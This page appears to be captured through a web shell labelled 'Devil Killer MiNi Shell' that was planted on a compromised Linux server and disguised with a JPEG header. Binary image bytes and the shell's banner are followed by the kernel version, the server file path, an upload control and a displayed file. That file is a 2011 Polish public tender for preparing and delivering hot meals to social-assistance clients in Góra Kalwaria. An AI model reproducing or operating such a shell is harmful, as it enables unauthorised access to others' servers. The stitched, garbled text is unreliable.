JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110607/146602-N-2011.html

<p class="kh_header"><b>Góra Kalwaria: Przygotowywanie, wydawanie na miejscu i dowóz gorących posiłków klientom Ośrodka w ramach realizacji decyzji przyznających posiłek, w rejonach ujętych w gminie Góra Kalwaria /3 części zamówienia/</b><br>
<b>Numer ogłoszenia: 146602 - 2011; data zamieszczenia: 07.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Górze Kalwarii , ul. Pijarska 40, 05-530 Góra Kalwaria, woj. mazowieckie, tel. 0-22 7272907, faks 0-22 7273336.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc Społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowywanie, wydawanie na miejscu i dowóz gorących posiłków klientom Ośrodka w ramach realizacji decyzji przyznających posiłek, w rejonach ujętych w gminie Góra Kalwaria /3 części zamówienia/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot główny zamówienia:
CPV:  55.32.10.00-6 - Usługi przygotowywania posiłków.
Przedmiot dodatkowy zamówienia:
CPV: 55.52.00.00-1 - Usługi dostarczania posiłków,
CPV: 55.52.40.00-1 - Usługi Dostarczania posiłków do szkół.
Przedmiotem zamówienia jest usługa: przygotowywanie, wydawanie na miejscu i dowóz gorących posiłków klientom Ośrodka w ramach realizacji decyzji przyznających posiłek, w rejonach ujętych w gminie Góra Kalwaria -3 części zamówienia.

1.	Zakres zamówienia:

Z posiłków korzystać będą klienci Ośrodka Pomocy Społecznej w szczególności: osoby niepełnosprawne, starsze, ubogie, bezrobotne, rodziny dysfunkcyjne, dzieci w szkołach.  
1.1	Wydawanie i dowóz posiłków będzie realizowany w Górze Kalwarii i na terenie gminy Góra Kalwaria podzielonej na 3 rejony:

Opis części zamówienia
Rejon-część I - Baniocha, Wilczynek, Solec, Szymanów, Tomice, Kąty, Mikówiec, Łubna,   - około 35 posiłków dziennie.
Rejon-część II - Góra Kalwaria, Brześce, Moczydłów, Podłęcze, Wólka Załęska, Wólka Dworska - około 65 posiłków dziennie.
- Wykonawca musi posiadać lokal  w Górze Kalwarii przystosowany i spełniający warunki -decyzja PPIS- do wydawania gorących posiłków na terenie zamkniętym ulicami:
- Budowlanych, Broniewskiego, Wyszyńskiego, Pijarska, Szpitalna, Ks. Sajny, Dominikańska, Grójecka, Marianki oraz teren byłej Jednostki Wojskowej;
- Wydawane posiłki to ok. 80 % wszystkich posiłków.

 Rejon - część III - Buczynów, Cendrowice, Czaplin, Czaplinek, Dębówka, Dobiesz, Julianów, Linin, Obręb, Sierzchów,  Ługówka, Wincentów, Wojciechowice, Borki, Brzumin, Czersk, Ostrówik, Aleksandrów, Karolina, Coniew, Królewski Las, Pęcław, Podgóra, Podosowa, Potycz, Szpruch, Czachówek, Krzaki Czaplinkowskie,  Sobików, Czarny Las - około 50 posiłków dziennie.

1.2	Posiłki wydawane będą przez 5 dni w tygodniu w godz. 12:00-15:00.
1.3	Z posiłków korzystać będzie około 150 osób  - około 20 % dzieci -3 części- dziennie przez 18 miesięcy od dnia  podpisania umowy.  
1.4	Wykonawca zobowiązany będzie do przygotowywania obiadów o najwyższym standardzie,
na bazie produktów najwyższej jakości i bezpieczeństwem, zgodnie z obowiązującymi w tym
zakresie normami.
Przy przygotowywaniu posiłków uwzględnić należy zalecaną wartość energetyczną oraz
uwzględnić normy produktów każdej z grup.
1.5	Wartość jednego gorącego posiłku będzie tożsama z podaną przez Wykonawcę usługi ofertową ceną jednostkową obiadu dwudaniowego.
1.6	Zamawiający dopuszcza możliwość dostarczenia w każdym tygodniu:
1)	jednego posiłku bezmięsnego;
2)	jednego posiłku na bazie mięsa mielonego;
3)	jednego posiłku z ryby;
o określonej gramaturze posiłków dla dorosłych:
1)	zupa - minimum 0,5 litra;
2)	ziemniaki, kasza, ryż, makaron (do wyboru) - minimum 250 gram;
3)	mięso, ryby - minimum 150 gram;
4)	surówka - minimum 300 gram;
oraz dla dzieci:
1)	zupa minimum 0,3 litra;
2)	ziemniaki, kasza, ryż, makaron ( do wyboru) - minimum 150 gram;
3)	mięso, ryby - minimum 60 gram;
4)	surówka - minimum 90 gram.
1.7	Oferowane posiłki muszą być wysokiej jakości, zarówno co do wartości odżywczej, gramatury, jak i estetyki oraz muszą uwzględniać polską tradycję kulinarną.
1.8	Oferowany asortyment potraw musi być pełnowartościowy pod względem odżywczym oraz
urozmaicony w sposób zapewniający różnorodność i niepowtarzalność w okresie
dziesięciodniowym.
1.9	Zamawiający wymaga, aby surowcowy,  tzw. - wsad do kotła - umożliwiał wyprodukowanie dwudaniowego obiadu, z uwzględnieniem wymogów niniejszej specyfikacji, nie był niższy niż   5 zł brutto dla dorosłych i 4 zł brutto dla dzieci, licząc w cenach hurtowych.
1.10	Zamawiający określa wielkość przedmiotu zamówienia na ok.   48 000 obiadów w terminie 18 miesięcy od dnia podpisania umowy. Liczba ta może się wahać w granicach +/- 20% w zależności od faktycznych potrzeb. 
1.11	Rozliczenia finansowe Wykonawcy usługi z Zamawiającym odbywać  się będą na podstawie ilości faktycznie zrealizowanych posiłków, załączonych do faktury imiennych rozliczeń  i ich ceny (wartości) jednostkowej.
1.12	Wykonawca otrzyma od Zamawiającego listę imienną wraz z adresami klientów  uprawnionych do otrzymania posiłku.
1.13	Przed rozpoczęciem realizacji zamówienia na kolejny miesiąc Wykonawca dostarczy Zamawiającemu jadłospis.
1.14	Wyznaczony pracownik Zamawiającego będzie sprawował nadzór nad jakością, ilością i przestrzeganiem obowiązujących norm przy sporządzaniu posiłków. W przypadku ich zakwestionowania posiłki będą  podlegały wymianie na koszt Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przygotowywanie, wydawanie na miejscu i dowóz gorących posiłków klientom Ośrodka w ramach realizacji decyzji przyznających posiłek, w rejonach ujętych w gminie Góra Kalwaria - 3 części zamówienia.
1.	Zakres zamówienia:

Z posiłków korzystać będą klienci Ośrodka Pomocy Społecznej w szczególności: osoby niepełnosprawne, starsze, ubogie, bezrobotne, rodziny dysfunkcyjne, dzieci w szkołach.  
1.1	Wydawanie i dowóz posiłków będzie realizowany w Górze Kalwarii i na terenie gminy Góra Kalwaria podzielonej na 3 rejony:

Opis części zamówienia
Rejon-część I - Baniocha, Wilczynek, Solec, Szymanów, Tomice, Kąty, Mikówiec, Łubna,   - około 35 posiłków dziennie.
Rejon-część II - Góra Kalwaria, Brześce, Moczydłów, Podłęcze, Wólka Załęska, Wólka Dworska - około 65 posiłków dziennie.
- Wykonawca musi posiadać lokal  w Górze Kalwarii przystosowany i spełniający warunki - decyzja PPIS - do wydawania gorących posiłków na terenie zamkniętym ulicami:
- Budowlanych, Broniewskiego, Wyszyńskiego, Pijarska, Szpitalna, Ks. Sajny, Dominikańska, Grójecka, Marianki oraz teren byłej Jednostki Wojskowej;
- Wydawane posiłki to ok. 80 % wszystkich posiłków.

 Rejon - część III - Buczynów, Cendrowice, Czaplin, Czaplinek, Dębówka, Dobiesz, Julianów, Linin, Obręb, Sierzchów,  Ługówka, Wincentów, Wojciechowice, Borki, Brzumin, Czersk, Ostrówik, Aleksandrów, Karolina, Coniew, Królewski Las, Pęcław, Podgóra, Podosowa, Potycz, Szpruch, Czachówek, Krzaki Czaplinkowskie,  Sobików, Czarny Las - około 50 posiłków dziennie.

1.2	Posiłki wydawane będą przez 5 dni w tygodniu w godz. 12:00-15:00.
1.3	Z posiłków korzystać będzie około 150 osób  - około 20 % dzieci - 3 części-dziennie.
1.4	Wykonawca zobowiązany będzie do przygotowywania obiadów o najwyższym standardzie,
na bazie produktów najwyższej jakości i bezpieczeństwem, zgodnie z obowiązującymi w tym
zakresie normami.
Przy przygotowywaniu posiłków uwzględnić należy zalecaną wartość energetyczną oraz
uwzględnić normy produktów każdej z grup.
1.5	Wartość jednego gorącego posiłku będzie tożsama z podaną przez Wykonawcę usługi ofertową ceną jednostkową obiadu dwudaniowego.
1.6	Zamawiający dopuszcza możliwość dostarczenia w każdym tygodniu:
1)	jednego posiłku bezmięsnego;
2)	jednego posiłku na bazie mięsa mielonego;
3)	jednego posiłku z ryby;
o określonej gramaturze posiłków dla dorosłych:
1)	zupa - minimum 0,5 litra;
2)	ziemniaki, kasza, ryż, makaron (do wyboru) - minimum 250 gram;
3)	mięso, ryby - minimum 150 gram;
4)	surówka - minimum 300 gram;
oraz dla dzieci:
1)	zupa minimum 0,3 litra;
2)	ziemniaki, kasza, ryż, makaron ( do wyboru) - minimum 150 gram;
3)	mięso, ryby - minimum 60 gram;
4)	surówka - minimum 90 gram.
1.7	Oferowane posiłki muszą być wysokiej jakości, zarówno co do wartości odżywczej, gramatury, jak i estetyki oraz muszą uwzględniać polską tradycję kulinarną.
1.8	Oferowany asortyment potraw musi być pełnowartościowy pod względem odżywczym oraz
urozmaicony w sposób zapewniający różnorodność i niepowtarzalność w okresie
dziesięciodniowym.
1.9	Zamawiający wymaga, aby surowcowy,  tzw. - wsad do kotła - umożliwiał wyprodukowanie dwudaniowego obiadu, z uwzględnieniem wymogów niniejszej specyfikacji, nie był niższy niż   5 zł brutto dla dorosłych i 4 zł brutto dla dzieci, licząc w cenach hurtowych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.52.40.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Formularz ofertowy  (Zał. nr 1 do SIWZ)
2) Dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
3) Dokumenty potwierdzające wprowadzenie i stosowanie  Systemu HACCP zobowiązujące zakład do przestrzegania zasad i wymagań jakościowych zdrowej żywności
4) Aktualną decyzję Państwowego Powiatowego Inspektora Sanitarnego zezwalającą na prowadzenie działalności w zakresie żywienia zbiorowego wydaną na podstawie Ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorakalwaria.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej 05-530 Góra Kalwaria ul. Pijarska 40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2011 godzina 09:15, miejsce: Ośrodek Pomocy Społecznej ul. Pijarska 40; 05-530 Góra Kalwaria w sekretariacie w pokoju nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowywanie, wydawanie na miejscu i dowóz gorących posiłków klientom Ośrodka w ramach realizacji decyzji przyznających posiłek, w rejonach ujętych w gminie Góra Kalwaria 1 część zamówienia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon-część I - Baniocha, Wilczynek, Solec, Szymanów, Tomice, Kąty, Mikówiec, Łubna,   - około 35 posiłków dziennie.

1.2	Posiłki wydawane będą przez 5 dni w tygodniu w godz. 12:00-15:00.
1.3	Z posiłków korzystać będzie około 35 osób  - około 20 % dzieci  dziennie przez 18 miesięcy od dnia  podpisania umowy.  
1.4	Wykonawca zobowiązany będzie do przygotowywania obiadów o najwyższym standardzie,
na bazie produktów najwyższej jakości i bezpieczeństwem, zgodnie z obowiązującymi w tym
zakresie normami.
Przy przygotowywaniu posiłków uwzględnić należy zalecaną wartość energetyczną oraz
uwzględnić normy produktów każdej z grup.
1.5	Wartość jednego gorącego posiłku będzie tożsama z podaną przez Wykonawcę usługi ofertową ceną jednostkową obiadu dwudaniowego.
1.6	Zamawiający dopuszcza możliwość dostarczenia w każdym tygodniu:
1)	jednego posiłku bezmięsnego;
2)	jednego posiłku na bazie mięsa mielonego;
3)	jednego posiłku z ryby;
o określonej gramaturze posiłków dla dorosłych:
1)	zupa - minimum 0,5 litra;
2)	ziemniaki, kasza, ryż, makaron (do wyboru) - minimum 250 gram;
3)	mięso, ryby - minimum 150 gram;
4)	surówka - minimum 300 gram;
oraz dla dzieci:
1)	zupa minimum 0,3 litra;
2)	ziemniaki, kasza, ryż, makaron ( do wyboru) - minimum 150 gram;
3)	mięso, ryby - minimum 60 gram;
4)	surówka - minimum 90 gram.
1.7	Oferowane posiłki muszą być wysokiej jakości, zarówno co do wartości odżywczej, gramatury, jak i estetyki oraz muszą uwzględniać polską tradycję kulinarną.
1.8	Oferowany asortyment potraw musi być pełnowartościowy pod względem odżywczym oraz
urozmaicony w sposób zapewniający różnorodność i niepowtarzalność w okresie
dziesięciodniowym.
1.9	Zamawiający wymaga, aby surowcowy,  tzw. - wsad do kotła - umożliwiał wyprodukowanie dwudaniowego obiadu, z uwzględnieniem wymogów niniejszej specyfikacji, nie był niższy niż   5 zł brutto dla dorosłych i 4 zł brutto dla dzieci, licząc w cenach hurtowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.52.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowywanie, wydawanie na miejscu i dowóz gorących posiłków klientom Ośrodka w ramach realizacji decyzji przyznających posiłek, w rejonach ujętych w gminie Góra Kalwaria - 1 część zamówienia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon-część II - Góra Kalwaria, Brześce, Moczydłów, Podłęcze, Wólka Załęska, Wólka Dworska - około 65 posiłków dziennie.
- Wykonawca musi posiadać lokal  w Górze Kalwarii przystosowany i spełniający warunki - decyzja PPIS - do wydawania gorących posiłków na terenie zamkniętym ulicami:
- Budowlanych, Broniewskiego, Wyszyńskiego, Pijarska, Szpitalna, Ks. Sajny, Dominikańska, Grójecka, Marianki oraz teren byłej Jednostki Wojskowej;
- Wydawane posiłki to ok. 80 % wszystkich posiłków.


1.2	Posiłki wydawane będą przez 5 dni w tygodniu w godz. 12:00-15:00.
1.3	Z posiłków korzystać będzie około 65 osób  - około 20 % dzieci dziennie przez 18 miesięcy od dnia  podpisania umowy.  
1.4	Wykonawca zobowiązany będzie do przygotowywania obiadów o najwyższym standardzie,
na bazie produktów najwyższej jakości i bezpieczeństwem, zgodnie z obowiązującymi w tym
zakresie normami.
Przy przygotowywaniu posiłków uwzględnić należy zalecaną wartość energetyczną oraz
uwzględnić normy produktów każdej z grup.
1.5	Wartość jednego gorącego posiłku będzie tożsama z podaną przez Wykonawcę usługi ofertową ceną jednostkową obiadu dwudaniowego.
1.6	Zamawiający dopuszcza możliwość dostarczenia w każdym tygodniu:
1)	jednego posiłku bezmięsnego;
2)	jednego posiłku na bazie mięsa mielonego;
3)	jednego posiłku z ryby;
o określonej gramaturze posiłków dla dorosłych:
1)	zupa - minimum 0,5 litra;
2)	ziemniaki, kasza, ryż, makaron (do wyboru) - minimum 250 gram;
3)	mięso, ryby - minimum 150 gram;
4)	surówka - minimum 300 gram;
oraz dla dzieci:
1)	zupa minimum 0,3 litra;
2)	ziemniaki, kasza, ryż, makaron ( do wyboru) - minimum 150 gram;
3)	mięso, ryby - minimum 60 gram;
4)	surówka - minimum 90 gram.
1.7	Oferowane posiłki muszą być wysokiej jakości, zarówno co do wartości odżywczej, gramatury, jak i estetyki oraz muszą uwzględniać polską tradycję kulinarną.
1.8	Oferowany asortyment potraw musi być pełnowartościowy pod względem odżywczym oraz
urozmaicony w sposób zapewniający różnorodność i niepowtarzalność w okresie
dziesięciodniowym.
1.9	Zamawiający wymaga, aby surowcowy,  tzw. - wsad do kotła - umożliwiał wyprodukowanie dwudaniowego obiadu, z uwzględnieniem wymogów niniejszej specyfikacji, nie był niższy niż   5 zł brutto dla dorosłych i 4 zł brutto dla dzieci, licząc w cenach hurtowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.52.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowywanie, wydawanie na miejscu i dowóz gorących posiłków klientom Ośrodka w ramach realizacji decyzji przyznających posiłek, w rejonach ujętych w gminie Góra Kalwaria 1 część zamówienia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon-część III - Buczynów, Cendrowice, Czaplin, Czaplinek, Dębówka, Dobiesz, Julianów, Linin, Obręb, Sierzchów,  Ługówka, Wincentów, Wojciechowice, Borki, Brzumin, Czersk, Ostrówik, Aleksandrów, Karolina, Coniew, Królewski Las, Pęcław, Podgóra, Podosowa, Potycz, Szpruch, Czachówek, Krzaki Czaplinkowskie,  Sobików, Czarny Las - około 50 posiłków dziennie.
1.2	Posiłki wydawane będą przez 5 dni w tygodniu w godz. 12:00-15:00.
1.3	Z posiłków korzystać będzie około 50 osób  - około 20 % dzieci  dziennie przez 18 miesięcy od dnia  podpisania umowy.  
1.4	Wykonawca zobowiązany będzie do przygotowywania obiadów o najwyższym standardzie,
na bazie produktów najwyższej jakości i bezpieczeństwem, zgodnie z obowiązującymi w tym
zakresie normami.
